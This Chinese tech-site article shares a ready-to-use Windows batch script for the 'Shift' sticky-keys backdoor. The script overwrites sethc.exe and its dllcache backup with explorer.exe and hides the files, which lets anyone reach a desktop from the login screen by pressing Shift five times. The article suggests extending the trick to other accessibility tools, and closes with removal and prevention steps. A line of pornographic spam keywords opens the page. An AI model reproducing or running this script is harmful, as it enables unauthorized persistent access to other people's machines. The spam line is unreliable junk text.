欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

shift后門批處理代碼與shift后門清除方法分享

  發(fā)布時間:2011-04-07 01:17:57   作者:佚名   我要評論
shift后門腳本代碼及shift后門清除方法,有服務(wù)器的朋友可以測試下。一定要關(guān)閉這個功能。
在cmd下輸入以下命令...
下面再打開記事本把底下的代碼粘貼進(jìn)去。

復(fù)制代碼
代碼如下:

@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后門
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件執(zhí)行完畢后,
echo 在終端界面按Shift 5次即可登陸系統(tǒng)!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后門安裝完畢!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

其實(shí)原理很簡單,就是利用了explorer.exe 這個資源管理器進(jìn)程替換調(diào)用的shift 默認(rèn)啟動程序,然后還覆蓋了windows的文件保護(hù)原文件(防止文件保護(hù)系統(tǒng)檢測到文件修改,會還原這些原來的程序,造成copy文件失去作用),當(dāng)調(diào)用shift是其實(shí)調(diào)用的真正程序是桌面進(jìn)程。Lyon: 同理,你也可以利用此方法替換屏幕鍵盤及放大鏡和組合鍵:win+u,其它自己可以拓展思路^_^
下面介紹如何清除此后門...
打開控制面板--輔助功能選項(xiàng)--粘滯鍵--設(shè)置--去掉使用快捷鍵的勾

還有要改下copy.exe的權(quán)限,不過在這里推薦大家把c盤所有的程序都 改下,只有administrator才能訪問

shift后門的預(yù)防解決辦法:預(yù)防很簡單的,連敲5次shift,然后在彈出的設(shè)置里面取消連滯鍵
已經(jīng)中了的話
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下
還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權(quán)限或拒絕訪問等,也可:)建議利用前者恢復(fù)。。。
收工!

相關(guān)文章

最新評論